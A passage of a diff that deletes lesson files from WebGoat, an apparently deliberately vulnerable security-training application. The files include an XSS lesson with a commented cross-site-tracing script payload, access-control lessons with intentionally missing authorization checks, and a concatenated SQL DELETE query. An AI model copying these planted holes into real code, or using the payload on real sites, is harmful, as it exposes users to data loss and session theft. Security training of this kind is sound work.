-    {
-        return Category.XSS;
-    }
-
-    /**
-     * Gets the hints attribute of the AccessControlScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add(getLabelManager().get("ReflectedXSSHint1"));
-        hints.add(getLabelManager().get("ReflectedXSSHint2"));
-        hints.add(getLabelManager().get("ReflectedXSSHint3"));
-        hints.add(getLabelManager().get("ReflectedXSSHint4"));
-        hints.add(getLabelManager().get("ReflectedXSSHint5"));
-        
-        return hints;
-    }
-
-    // <script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp
-    // = new
-    // ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false);
-    // xmlHttp.send();str1=xmlHttp.responseText;document.write(str1);}</script>
-    
-
-    private final static Integer DEFAULT_RANKING = new Integer(120);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the AccessControlScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return "Reflected XSS Attacks";
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/RemoteAdminFlaw.java

@@ -1,107 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created October 28, 2003
- */
-public class RemoteAdminFlaw extends LessonAdapter
-{
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        if (s.completedHackableAdmin())
-        {
-            makeSuccess(s);
-        }
-        return ec;
-
-    }
-
-    /**
-     * Gets the category attribute of the ForgotPassword object
-     * 
-     * @return The category value
-     */
-    protected Category getDefaultCategory()
-    {
-        return Category.ACCESS_CONTROL;
-    }
-
-    /**
-     * Gets the hints attribute of the HelloScreen object
-     * 
-     * @return The hints value
-     */
-    public List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add(getLabelManager().get("RemoteAdminFlawHint1"));
-        hints.add(getLabelManager().get("RemoteAdminFlawHint2"));
-        hints.add(getLabelManager().get("RemoteAdminFlawHint3"));
-        hints.add(getLabelManager().get("RemoteAdminFlawHint4"));
-        hints.add(getLabelManager().get("RemoteAdminFlawHint5"));
-
-        return hints;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(160);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the HelloScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("Remote Admin Access");
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java

@@ -1,156 +0,0 @@
-
-package org.owasp.webgoat.lessons.RoleBasedAccessControl;
-
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class DeleteProfile extends DefaultLessonAction
-{
-
-    private LessonAction chainedAction;
-
-    public DeleteProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
-    {
-        super(lesson, lessonName, actionName);
-        this.chainedAction = chainedAction;
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
-            UnauthorizedException, ValidationException
-    {
-        getLesson().setCurrentAction(s, getActionName());
-
-        int userId = getIntSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.USER_ID);
-        int employeeId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID);
-
-        if (isAuthenticated(s))
-        {
-            if (userId != employeeId) {
-            deleteEmployeeProfile(s, userId, employeeId);
-            }
-            try
-            {
-                chainedAction.handleRequest(s);
-            } catch (UnauthenticatedException ue1)
-            {
-                // System.out.println("Internal server error");
-                ue1.printStackTrace();
-            } catch (UnauthorizedException ue2)
-            {
-                // System.out.println("Internal server error");
-                ue2.printStackTrace();
-            }
-        }
-        else
-            throw new UnauthenticatedException();
-
-        updateLessonStatus(s);
-    }
-
-    public String getNextPage(WebSession s)
-    {
-        return RoleBasedAccessControl.LISTSTAFF_ACTION;
-    }
-
-    public void deleteEmployeeProfile(WebSession s, int userId, int employeeId) throws UnauthorizedException
-    {
-        try
-        {
-            // Note: The password field is ONLY set by ChangePassword
-            String query = "DELETE FROM employee WHERE userid = " + employeeId;
-            // System.out.println("Query: " + query);
-            try
-            {
-                Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                                    ResultSet.CONCUR_READ_ONLY);
-                statement.executeUpdate(query);
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error deleting employee profile");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error deleting employee profile");
-            e.printStackTrace();
-        }
-    }
-
-    public void deleteEmployeeProfile_BACKUP(WebSession s, int userId, int employeeId) throws UnauthorizedException
-    {
-        try
-        {
-            // Note: The password field is ONLY set by ChangePassword
-            String query = "DELETE FROM employee WHERE userid = " + employeeId;
-            // System.out.println("Query: " + query);
-            try
-            {
-                Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                                    ResultSet.CONCUR_READ_ONLY);
-                statement.executeUpdate(query);
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error deleting employee profile");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error deleting employee profile");
-            e.printStackTrace();
-        }
-    }
-
-    private void updateLessonStatus(WebSession s)
-    {
-        // If the logged in user is not authorized to be here, stage 1 is complete.
-        if (RoleBasedAccessControl.STAGE1.equals(getStage(s))) try
-        {
-            int userId = getIntSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.USER_ID);
-
-            if (!isAuthorized(s, userId, RoleBasedAccessControl.DELETEPROFILE_ACTION))
-            {
-                setStageComplete(s, RoleBasedAccessControl.STAGE1);
-            }
-        } catch (ParameterNotFoundException e)
-        {
-        }
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/RoleBasedAccessControl/EditProfile.java

@@ -1,165 +0,0 @@
-
-package org.owasp.webgoat.lessons.RoleBasedAccessControl;
-
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
-import org.owasp.webgoat.session.Employee;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class EditProfile extends DefaultLessonAction
-{
-
-    public EditProfile(GoatHillsFinancial lesson, String lessonName, String actionName)
-    {
-        super(lesson, lessonName, actionName);
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
-            UnauthorizedException
-    {
-        getLesson().setCurrentAction(s, getActionName());
-
-        if (isAuthenticated(s))
-        {
-            int userId = getUserId(s);
-            int employeeId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID);
-
-            Employee employee = getEmployeeProfile(s, userId, employeeId);
-            setSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.EMPLOYEE_ATTRIBUTE_KEY, employee);
-        }
-        else
-            throw new UnauthenticatedException();
-    }
-
-    public String getNextPage(WebSession s)
-    {
-        return RoleBasedAccessControl.EDITPROFILE_ACTION;
-    }
-
-    public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
-    {
-        Employee profile = null;
-
-        // Query the database for the profile data of the given employee
-        try
-        {
-            String query = "SELECT * FROM employee WHERE userid = ?";
-
-            try
-            {
-                PreparedStatement answer_statement = WebSession.getConnection(s)
-                        .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                answer_statement.setInt(1, subjectUserId);
-                ResultSet answer_results = answer_statement.executeQuery();
-                if (answer_results.next())
-                {
-                    // Note: Do NOT get the password field.
-                    profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
-                            answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
-                                    .getString("title"), answer_results.getString("phone"), answer_results
-                                    .getString("address1"), answer_results.getString("address2"), answer_results
-                                    .getInt("manager"), answer_results.getString("start_date"), answer_results
-                                    .getInt("salary"), answer_results.getString("ccn"), answer_results
-                                    .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
-                                    .getString("disciplined_notes"), answer_results.getString("personal_description"));
-                    /*
-                     * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-                     * " " + profile.getLastName() + " (" + profile.getId() + ")");
-                     */}
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error getting employee profile");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error getting employee profile");
-            e.printStackTrace();
-        }
-
-        return profile;
-    }
-
-    public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
-    {
-        // Query the database to determine if this employee has access to this function
-        // Query the database for the profile data of the given employee if "owned" by the given
-        // user
-
-        Employee profile = null;
-
-        // Query the database for the profile data of the given employee
-        try
-        {
-            String query = "SELECT * FROM employee WHERE userid = ?";
-
-            try
-            {
-                PreparedStatement answer_statement = WebSession.getConnection(s)
-                        .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                answer_statement.setInt(1, subjectUserId);
-                ResultSet answer_results = answer_statement.executeQuery();
-                if (answer_results.next())
-                {
-                    // Note: Do NOT get the password field.
-                    profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
-                            answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
-                                    .getString("title"), answer_results.getString("phone"), answer_results
-                                    .getString("address1"), answer_results.getString("address2"), answer_results
-                                    .getInt("manager"), answer_results.getString("start_date"), answer_results
-                                    .getInt("salary"), answer_results.getString("ccn"), answer_results
-                                    .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
-                                    .getString("disciplined_notes"), answer_results.getString("personal_description"));
-                    /*
-                     * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-                     * " " + profile.getLastName() + " (" + profile.getId() + ")");
-                     */}
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error getting employee profile");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error getting employee profile");
-            e.printStackTrace();
-        }
-
-        return profile;
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java

@@ -1,459 +0,0 @@
-
-package org.owasp.webgoat.lessons.RoleBasedAccessControl;
-
-import java.io.BufferedReader;
-import java.io.FileReader;
-import java.io.IOException;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.ElementContainer;
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.FindProfile;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.ListStaff;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.Login;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.Logout;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.SearchStaff;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class RoleBasedAccessControl extends GoatHillsFinancial
-{
-    private final static Integer DEFAULT_RANKING = new Integer(125);
-
-    public final static String STAGE1 = "Bypass Business Layer Access Control";
-
-    public final static String STAGE2 = "Add Business Layer Access Control";
-
-    public final static String STAGE3 = "Bypass Data Layer Access Control";
-
-    public final static String STAGE4 = "Add Data Layer Access Control";
-
-    protected void registerActions(String className)
-    {
-        registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
-        registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
-        registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
-        registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
-        
-        // This action has not yet been implemented. None of the lessons require it.
-        registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
-
-        // These actions are special in that they chain to other actions.
-        registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION)));
-        registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION)));
-        registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
-        registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
-        registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
-    }
-
-    /**
-     * Gets the category attribute of the CommandInjection object
-     * 
-     * @return The category value
-     */
-    public Category getDefaultCategory()
-    {
-        return Category.ACCESS_CONTROL;
-    }
-
-    /**
-     * Gets the hints attribute of the DirectoryScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("Many sites attempt to restrict access to resources by role.");
-        hints.add("Developers frequently make mistakes implementing this scheme.");
-        hints.add("Attempt combinations of users, roles, and resources.");
-
-        // Stage 1
-        hints.add("Stage1: How does the application know that the user selected the delete function?");
-
-        // Stage 2
-        hints.add("Stage2: You have to code to check the authorization of the user for the action.");
-
-
-        // Stage 3
-        hints.add("Stage3: How does the application know that the user selected any particular employee to view?");
-
-        // Stage 4
-        hints.add("Note that the contents of the staff listing change depending on who is logged in.");
-
-        hints
-                .add("Stage4: You have to code to check the authorization of the user for the action on a certain employee.");
-
-        return hints;
-    }
-
-    @Override
-    public String[] getStages()
-    {
-        if (getWebgoatContext().isCodingExercises()) return new String[] { STAGE1, STAGE2, STAGE3, STAGE4 };
-        return new String[] { STAGE1, STAGE3 };
-    }
-
-    /**
-     * Gets the instructions attribute of the ParameterInjection object
-     * 
-     * @return The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-        String instructions = "";
-
-        if (!getLessonTracker(s).getCompleted())
-        {
-            String stage = getStage(s);
-            if (STAGE1.equals(stage))
-            {
-                instructions = "Stage 1: Bypass Presentational Layer Access Control.<br />"
-                        + "As regular employee 'Tom', exploit weak access control to use the Delete function from the Staff List page. "
-                        + "Verify that Tom's profile can be deleted. "
-                        + "The passwords for users are their given names in lowercase (e.g. the password for Tom Cat is \"tom\").";
-            }
-            else if (STAGE2.equals(stage))
-            {
-                instructions = "Stage 2: Add Business Layer Access Control.<br><br />"
-                        + "<b><font color=\"blue\"> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br /><br />"
-                        + "Implement a fix to deny unauthorized access to the Delete function. "
-                        + "To do this, you will have to alter the WebGoat code. "
-                        + "Once you have done this, repeat stage 1 and verify that access to DeleteProfile functionality is properly denied.";
-            }
-            else if (STAGE3.equals(stage))
-            {
-                instructions = "Stage 3: Breaking Data Layer Access Control.<br />"
-                        + "As regular employee 'Tom', exploit weak access control to View another employee's profile. Verify the access.";
-            }
-            else if (STAGE4.equals(stage))
-            {
-                instructions = "Stage 4: Add Data Layer Access Control.<br><br />"
-                        + "<b><font color=\"blue\"> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br /><br />"
-                        + "Implement a fix to deny unauthorized access to this data. "
-                        + "Once you have done this, repeat stage 3, and verify that access to other employee's profiles is properly denied.";
-            }
-        }
-
-        return instructions;
-    }
-
-    public String getLessonSolutionFileName(WebSession s)
-    {
-        String solutionFileName = null;
-        String stage = getStage(s);
-        solutionFileName = "/lesson_solutions_1/Lab Access Control/Lab " + stage + ".html";
-        return solutionFileName;
-    }
-
-    @Override
-    public String getSolution(WebSession s)
-    {
-        String src = null;
-
-        try
-        {
-            src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))),
-                                false);
-        } catch (IOException e)
-        {
-            s.setMessage("Could not find the solution file");
-            src = ("Could not find the solution file");
-        }
-        return src;
-    }
-
-    public void handleRequest(WebSession s)
-    {
-        // Here is where dispatching to the various action handlers happens.
-        // It would be a good place verify authorization to use an action.
-
-        // System.out.println("RoleBasedAccessControl.handleRequest()");
-        if (s.getLessonSession(this) == null) s.openLessonSession(this);
-
-        String requestedActionName = null;
-        try
-        {
-            requestedActionName = s.getParser().getStringParameter("action");
-        } catch (ParameterNotFoundException pnfe)
-        {
-            // Let them eat login page.
-            requestedActionName = LOGIN_ACTION;
-        }
-        // System.out.println("Requested lesson action: " + requestedActionName);
-
-        try
-        {
-            DefaultLessonAction action = (DefaultLessonAction) getAction(requestedActionName);
-            if (action != null)
-            {
-                // System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: " +
-                // action.getActionName());
-                if (!action.requiresAuthentication())
-                {
-                    // Access to Login does not require authentication.
-                    action.handleRequest(s);
-                }
-                else
-                {
-                    // ***************CODE HERE*************************
-
-                    // *************************************************
-                    if (action.isAuthenticated(s))
-                    {
-                        action.handleRequest(s);
-                    }
-                    else
-                        throw new UnauthenticatedException();
-                }
-            }
-            else
-                setCurrentAction(s, ERROR_ACTION);
-        } catch (ParameterNotFoundException pnfe)
-        {
-            // System.out.println("Missing parameter");
-            pnfe.printStackTrace();
-            setCurrentAction(s, ERROR_ACTION);
-        } catch (ValidationException ve)
-        {
-            // System.out.println("Validation failed");
-            ve.printStackTrace();
-            setCurrentAction(s, ERROR_ACTION);
-        } catch (UnauthenticatedException ue)
-        {
-            s.setMessage("Login failed");
-            // System.out.println("Authentication failure");
-            ue.printStackTrace();
-        } catch (UnauthorizedException ue2)
-        {
-            s.setMessage("You are not authorized to perform this function");
-
-            // Update lesson status if necessary.
-            String stage = getStage(s);
-            if (STAGE2.equals(stage))
-            {
-                try
-                {
-                    if (RoleBasedAccessControl.DELETEPROFILE_ACTION.equals(requestedActionName)
-                            && !isAuthorized(s, getUserId(s), RoleBasedAccessControl.DELETEPROFILE_ACTION))
-                    {
-                        setStageComplete(s, STAGE2);
-                    }
-                } catch (ParameterNotFoundException pnfe)
-                {
-                    pnfe.printStackTrace();
-                }
-            }
-            // System.out.println("isAuthorized() exit stage: " + getStage(s));
-            // Update lesson status if necessary.
-            if (STAGE4.equals(stage))
-            {
-                try
-                {
-                    // System.out.println("Checking for stage 4 completion");
-                    DefaultLessonAction action = (DefaultLessonAction) getAction(getCurrentAction(s));
-                    int userId = Integer.parseInt((String) s.getRequest().getSession()
-                            .getAttribute(getLessonName() + "." + RoleBasedAccessControl.USER_ID));
-                    int employeeId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID);
-
-                    if (!action.isAuthorizedForEmployee(s, userId, employeeId))
-                    {
-                        setStageComplete(s, STAGE4);
-                    }
-                } catch (Exception e)
-                {
-                    // swallow this - shouldn't happen inthe normal course
-                    // e.printStackTrace();
-                }
-            }
-
-            // System.out.println("Authorization failure");
-            setCurrentAction(s, ERROR_ACTION);
-            ue2.printStackTrace();
-        } catch (Exception e)
-        {
-            // All other errors send the user to the generic error page
-            // System.out.println("handleRequest() error");
-            e.printStackTrace();
-            setCurrentAction(s, ERROR_ACTION);
-        }
-
-        // All this does for this lesson is ensure that a non-null content exists.
-        setContent(new ElementContainer());
-    }
-
-    public void handleRequest_BACKUP(WebSession s)
-    {
-        // Here is where dispatching to the various action handlers happens.
-        // It would be a good place verify authorization to use an action.
-
-        // System.out.println("RoleBasedAccessControl.handleRequest()");
-        if (s.getLessonSession(this) == null) s.openLessonSession(this);
-
-        String requestedActionName = null;
-        try
-        {
-            requestedActionName = s.getParser().getStringParameter("action");
-        } catch (ParameterNotFoundException pnfe)
-        {
-            // Let them eat login page.
-            requestedActionName = LOGIN_ACTION;
-        }
-        // System.out.println("Requested lesson action: " + requestedActionName);
-
-        if (requestedActionName != null)
-        {
-            try
-            {
-                LessonAction action = getAction(requestedActionName);
-                if (action != null)
-                {
-                    // System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: "
-                    // + action.getActionName());
-                    if (!action.requiresAuthentication())
-                    {
-                        // Access to Login does not require authentication.
-                        action.handleRequest(s);
-                    }
-                    else
-                    {
-                        if (action.isAuthenticated(s))
-                        {
-                            int userId = action.getUserId(s);
-                            if (action.isAuthorized(s, userId, action.getActionName()))
-                            {
-                                action.handleRequest(s);
-                            }
-                            else
-                            {
-                                throw new UnauthorizedException();
-                            }
-                        }
-                        else
-                            throw new UnauthenticatedException();
-                    }
-                }
-                else
-                    setCurrentAction(s, ERROR_ACTION);
-            } catch (ParameterNotFoundException pnfe)
-            {
-                // System.out.println("Missing parameter");
-                pnfe.printStackTrace();
-                setCurrentAction(s, ERROR_ACTION);
-            } catch (ValidationException ve)
-            {
-                // System.out.println("Validation failed");
-                ve.printStackTrace();
-                setCurrentAction(s, ERROR_ACTION);
-            } catch (UnauthenticatedException ue)
-            {
-                s.setMessage("Login failed");
-                // System.out.println("Authentication failure");
-                ue.printStackTrace();
-            } catch (UnauthorizedException ue2)
-            {
-                String stage = getStage(s);
-                // Update lesson status if necessary.
-                if (STAGE2.equals(stage))
-                {
-                    try
-                    {
-                        if (RoleBasedAccessControl.DELETEPROFILE_ACTION.equals(requestedActionName)
-                                && !isAuthorized(s, getUserId(s), RoleBasedAccessControl.DELETEPROFILE_ACTION))
-                        {
-                            setStageComplete(s, STAGE2);
-                        }
-                    } catch (ParameterNotFoundException pnfe)
-                    {
-                        pnfe.printStackTrace();
-                    }
-                }
-                // System.out.println("isAuthorized() exit stage: " + getStage(s));
-                // Update lesson status if necessary.
-                if (STAGE4.equals(stage))
-                {
-                    try
-                    {
-                        // System.out.println("Checking for stage 4 completion");
-                        DefaultLessonAction action = (DefaultLessonAction) getAction(getCurrentAction(s));
-                        int userId = Integer.parseInt((String) s.getRequest().getSession()
-                                .getAttribute(getLessonName() + "." + RoleBasedAccessControl.USER_ID));
-                        int employeeId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID);
-
-                        if (!action.isAuthorizedForEmployee(s, userId, employeeId))
-                        {
-                            setStageComplete(s, STAGE4);
-                        }
-                    } catch (Exception e)
-                    {
-                        // swallow this - shouldn't happen inthe normal course
-                        // e.printStackTrace();
-                    }
-                }
-
-                s.setMessage("You are not authorized to perform this function");
-                // System.out.println("Authorization failure");
-                setCurrentAction(s, ERROR_ACTION);
-                ue2.printStackTrace();
-            } catch (Exception e)
-            {
-                // All other errors send the user to the generic error page
-                // System.out.println("handleRequest() error");
-                e.printStackTrace();
-                setCurrentAction(s, ERROR_ACTION);
-            }
-        }
-
-        // All this does for this lesson is ensure that a non-null content exists.
-        setContent(new ElementContainer());
-    }
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the DirectoryScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return "LAB: Role Based Access Control";
-    }
-}